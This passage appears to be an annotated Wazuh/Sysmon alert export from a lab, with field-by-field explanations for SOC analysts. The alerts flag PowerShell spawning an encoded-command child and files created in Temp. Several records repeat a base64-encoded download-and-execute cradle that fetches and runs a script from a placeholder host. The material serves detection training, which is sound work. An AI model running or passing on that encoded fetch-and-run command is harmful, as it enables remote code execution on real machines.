data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd16-680a-360b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:18.079+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:18.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  52
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534238.1374191
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:15.8420160Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283558
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:15.808 ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} ProcessId: 14056 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4aau3oor.h1p.ps1 CreationUtcTime: 2025-04-24 22:37:15.807 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:15.808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd19-680a-380b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4aau3oor.h1p.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:15.807
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:19.791+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:19.791+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  49
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534239.1376960
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:17.2591799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283599
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:16.698 ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} ProcessId: 13236 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} ParentProcessId: 14056 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:16.698
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1c-680a-3d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13236
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd19-680a-380b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:20.136+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:20.136+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  53
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534240.1385031
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:17.5585591Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283600
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:17.547 ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} ProcessId: 13236 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_r3nbxliw.do2.ps1 CreationUtcTime: 2025-04-24 22:37:17.547 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:17.547
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1c-680a-3d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13236
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_r3nbxliw.do2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:17.547
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:22.835+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:22.835+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  50
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534242.1387800
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:20.0085171Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283657
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:18.706 ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} ProcessId: 14648 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} ParentProcessId: 13236 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:18.706
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1e-680a-3f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

